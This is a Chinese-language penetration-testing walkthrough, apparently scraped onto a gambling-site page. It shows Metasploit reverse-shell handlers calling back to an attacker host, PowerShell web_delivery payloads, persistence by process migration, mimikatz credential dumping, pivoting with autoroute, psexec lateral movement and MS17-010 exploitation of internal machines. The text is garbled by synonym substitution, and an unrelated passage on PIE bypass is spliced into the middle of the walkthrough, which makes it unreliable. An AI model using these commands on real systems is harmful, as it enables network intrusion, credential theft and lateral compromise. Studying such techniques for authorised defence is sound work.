欢迎访问Sunbet官网(www.sunbet.us),Allbet欧博官网(www.ALLbetgame.us)!

首页Sunbet_安全防护正文

【基本向】实战解说内网渗入思绪

b9e08c31ae1faa592019-12-1573申博_新闻事件

简介

本次测试为实战测试,测试环境是受权项目中的一部份,敏感信息内容已做打码处置惩罚,仅供议论进修。因为本人在内网方面的掌握也是属于新手阶段,运用到的一些msf进击手段也很基础,请列位表哥多多指教。

取得shell

Getshell的历程没什么好说的,不过简朴的背景弱口令到上传然后冰蝎衔接getshell。 取得shell后,模仿终端ping 8.8.8.8有返回包,申明该效劳器与外网互通。 【基本向】实战解说内网渗入思绪  申博_新闻事件 第1张 既然跟外网互通,那末可以尝试直接运用msf的exploit/multi/handler合营冰蝎反弹shell来取得session
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost xxx.xxx.xxx.xxx
set lport 5665
run
【基本向】实战解说内网渗入思绪  申博_新闻事件 第2张 然则效果很不尽人意,没可以胜利取得session。 在运用冰蝎模仿终端收集信息历程当中,发明当地有powershell历程。 再次翻开msf,本次尝试运用web_delivery合营终端实行powershell指令来取得session。
User exploit/multi/script/web_delivery
Set targets 2
set payload windows/x64/meterpreter/reverse_https
set lhost xxx.xxx.xxx.xxx
set lport 4332
set srvport
run
【基本向】实战解说内网渗入思绪  申博_新闻事件 第3张 【基本向】实战解说内网渗入思绪  申博_新闻事件 第4张 取得payload,运用冰蝎或许C刀模仿终端直接实行,胜利取得session,实行getuid发明权限为system权限,省去了提权历程。 【基本向】实战解说内网渗入思绪  申博_新闻事件 第5张

权限保持

为了取得一个耐久稳固的高权限session,我们需要将当前的session历程迁移到一个耐久、坚硬又稳固的历程上,防备倏忽暴毙(咳咳)
我们运用ps检察当前历程,然后选中一个看起来比较耐久的幸运儿spoolsv.exe(这是一个用来掌握打印的历程,我碰到的机械基础都开启了此历程) 注重:挑选历程的时刻优先挑选体系历程,这类比较耐久且为system权限
migrate 历程号
getpid
【基本向】实战解说内网渗入思绪  申博_新闻事件 第6张

内网信息汇集

不管是在什么范例的渗入环境下,信息汇集永远是不可缺乏的一环,他决议了你渗入的效力,可以让你在渗入历程当中少走许多弯路,毕竟在项目上尤其是红蓝攻防中,最缺的永远是时候
接下来,检察IP信息以及arp缓存,检察网段散布状况: 【基本向】实战解说内网渗入思绪  申博_新闻事件 第7张 【基本向】实战解说内网渗入思绪  申博_新闻事件 第8张 发明该效劳器只存在192.168.10.0/24网段的信息 因而继承检察其他信息
Netstat -ano
发明效劳器开放3389端口: 【基本向】实战解说内网渗入思绪  申博_新闻事件 第9张 既然开启了3389端口,我们运用端口转发,登录到效劳器看看有无不测收成。
portfwd add -l 6666 -p 3389 -r 127.0.0.1
IP有了,3389开了,如今我们缺乏的是用户名暗码 直接meterpreter下加载mimikatz
PIE保护详解和常用bypass手法 什么是PIE呢? PIE全称是position-independent executable,中文解释为地址无关可执行文件,该技术是一个针对代码段(.text)、数据段(.data)、未初始化全局变量段(.bss)等固定地址的一个防护技术,如果程序开启了PIE保护的话,在每次加载程序时都变换加载地址,从而不能通过ROPgadget等一些工具来帮助解题 下面通过一个例子来具体看一下PIE的效果 程序源码 #include int main() { printf("%s","hello world!"); return 0; } 编译命令 gcc -fno-stack-protector -no-pie -s test.c -o test #不开启PIE保护 不开启PIE保护的时候每次运行时加载地址不变 开启PIE保护的时候每次运行时加载地址是随机变化的 可以看出,如果一个程序开启了PIE保护的话,对于ROP造成很大影响,下面来讲解一下绕过PIE开启的方
Load mimikatz
Wdigest
比较遗憾的是没能获取到明文暗码,然则我这边运用cobalt strike加载的mimikatz胜利获取到明文暗码 emmm总之搞不懂的处所先归为玄学问题 【基本向】实战解说内网渗入思绪  申博_新闻事件 第10张 如今,暗码也有了,mstsc链接目的3389端口胜利此处触及的敏感信息较多,摒弃截图,我只管用语言表述清晰思绪 上传netpass检察rdp缓存,无果,然则发明体系有VNC
VNC:VNC (Virtual Network Console)是假造收集掌握台的缩写,是一款长途掌握工具软件。
检察VNC相干文件发明新的网段信息,然则没有保留的衔接信息,不过能取得新的网段信息也是满足了 【基本向】实战解说内网渗入思绪  申博_新闻事件 第11张

横向

至此,信息收集部份实在也就差不多,接下来我们入手下手尝试横向挪动
依据之前发明的网段信息以及效劳器本机的路由信息,我们手动增加路由
Run autoroute -s 192.168.10.0/24
Run autoroute -s 172.16.0.0/24
……
其他网段同理,增加路由以后bg退回到掌握台 先运用auxiliary/scanner/smb/smb_version模块扫描一下各网段的smb效劳开启状况
Use auxiliary/scanner/smb/smb_version
set rhosts 192.168.10.0/24
set threads 10
run
【基本向】实战解说内网渗入思绪  申博_新闻事件 第12张 可以看到,在世的机械还挺多。 【基本向】实战解说内网渗入思绪  申博_新闻事件 第13张 然后,运用auxiliary/scanner/smb/psexec_loggedin_users模块合营已取得的两组账户暗码举行横向
Use auxiliary/scanner/smb/psexec_loggedin_users
Set rhosts 192.168.10.0/24
Set smbuser username
Set smbpass password
Set threads 5
run
【基本向】实战解说内网渗入思绪  申博_新闻事件 第14张 为难,横向失利,竟然没有用同账户暗码 【基本向】实战解说内网渗入思绪  申博_新闻事件 第15张 既然横向失利,可以斟酌最简朴的,但也是最有用的大杀器,ms17-010 先运用scanner模块扫描一下哪些机械大概存在ms17-010的破绽
Use auxiliary/scanner/smb/smb_ms17_010
Set rhosts 192.168.10.0/24
Set thread 20
Run
【基本向】实战解说内网渗入思绪  申博_新闻事件 第16张 因为打ms17-010的流量比较大,为了防备死掉,我依据扫描出来的效果,针对性的挑选一台觉得比较轻易搞的目的,零丁打。 此处试了许多机械,很多都打了补丁,不过也有漏网之鱼,此处零丁拿一台示例: Use auxiliary/admin/smb/ms17_010_command set rhost 192.168.10.18 set command whoami run 胜利实行,是system权限,同理command换成弹shell的敕令,便可以取得该机械的权限。 【基本向】实战解说内网渗入思绪  申博_新闻事件 第17张 取得新机械的权限以后,便可以缭绕新机械举行新一轮的信息汇集,然后不停横向,进一步扩展内网战果,以下,就不在多做测试。 别的关于ms17-010,如果说打2003的机械,发起运用auxiliary/admin/smb/ms17_010_command模块举行实行敕令取得session;其他的可以直接运用exploit/windows/smb/ms17_010_eternalblue或许exploit/windows/smb/ms17_010_psexec来直接取得session。

写在末了

咕或人提醒您:途径千万条,平安第一条;渗入不范例,亲人两行泪。 以上渗入测试历程纯属本人诬捏,渗入是不大概渗入的,这辈子都不大概渗入的。 末了,关于历程当中有任何疑问都可以批评留言,我会的会逐一复兴,不会的也能让途经的表哥给康康,说不定表哥就给处理了呢,嘿嘿(发出了白嫖的笑声)。  

网友评论